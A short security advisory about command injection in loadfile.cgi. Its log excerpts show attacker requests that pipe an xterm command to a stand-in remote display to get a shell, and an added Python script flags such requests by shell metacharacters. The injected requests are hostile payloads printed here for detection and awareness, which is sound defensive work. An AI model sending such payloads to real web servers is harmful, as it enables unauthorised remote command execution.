Release Date: 02,2002

Headline

Exploitable CGI - loadfile.cgi

Whitehats.ca has seen signs of loadfile.cgi being used to execute arbitrary commands on web servers. If you are using this CGI, it is highly recommended that the code be audited to confirm it has appropriate error checking in place.

The SANS Institute's "consensus"-based SANS/FBI Top 20 List currently places CGI vulnerabilities in the #7 position among the top vulnerabilities.

 

In the following example, the attacker successfully passed commands to a Netscape Enterprise Web Server to upload a file and return a remote shell.

aaa.bbb.ccc.ddd - - [22/Jan/2001:05:56:16 -0700] "GET /cgi-progs/loadfile.cgi?file=service_voluntr.htm HTTP/1.0" 200 24813 "http://www.google.com/search?q=allinurl%3A+%22.cgi%3FFILE%3D%22&num=100&hl=en&lr=&safe=off&btnG=Google+Search" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
aaa.bbb.ccc.ddd - - [24/Jan/2001:06:03:22 -0700] "GET /cgi-progs/loadfile.cgi?file=|"/usr/openwin/bin/xterm"%20-ut%20-display%20bad.guy.ip.addr:0| HTTP/1.0" 200 20390 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
aaa.bbb.ccc.ddd - - [08/Feb/2001:02:39:42 -0700] "GET /cgi-progs/loadfile.cgi?file=|"/usr/openwin/bin/xterm"%20-ut%20-bg%20red%20-display%20bad.guy2.ip.addr:0| HTTP/1.0" 200 246 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
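To check your own access logs for requests like the ones above, the following is an added example (not code from Whitehats.ca) that flags loadfile.cgi requests whose decoded parameters contain shell metacharacters. The function names and the metacharacter list are assumptions; the sample lines are two of the entries above with the referer and user-agent fields shortened.

```python
import re
from urllib.parse import unquote

# The injected value contains unescaped double quotes, so the request field is
# delimited by the ' HTTP/x.y" <status> <size>' tail rather than by '"'.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/\d\.\d" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Assumed list: characters that do not belong in a file name passed to a file-loading CGI.
SUSPICIOUS = re.compile(r'[|;&`$<>\n\r\x00]|\.\./')

def suspicious_params(target):
    """Return (name, decoded_value) pairs from the query string that look unsafe."""
    _, _, query = target.partition("?")
    hits = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote(raw.replace("+", " "))  # decode %xx and '+' before matching
        if SUSPICIOUS.search(value):
            hits.append((name, value))
    return hits

def scan(lines, path_suffix="loadfile.cgi"):
    """Return one finding per suspicious parameter in requests to the CGI."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not m["target"].partition("?")[0].endswith(path_suffix):
            continue
        for name, value in suspicious_params(m["target"]):
            findings.append({"client": m["client"], "time": m["ts"],
                             "status": int(m["status"]), "param": name, "value": value})
    return findings

# Sample input: two entries from this advisory, referer and user-agent shortened.
SAMPLE = [
    'aaa.bbb.ccc.ddd - - [22/Jan/2001:05:56:16 -0700] "GET /cgi-progs/loadfile.cgi'
    '?file=service_voluntr.htm HTTP/1.0" 200 24813 "-" "Mozilla/4.0"',
    'aaa.bbb.ccc.ddd - - [24/Jan/2001:06:03:22 -0700] "GET /cgi-progs/loadfile.cgi'
    '?file=|"/usr/openwin/bin/xterm"%20-ut%20-display%20bad.guy.ip.addr:0| HTTP/1.0"'
    ' 200 20390 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["time"], f["client"], f["status"], f["param"], repr(f["value"]))
```
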

Contact Information:

Contact Information -- info@whitehats.ca

 

Credits:

Michael McDonnell


Copyright © 2000-2014 Whitehats.ca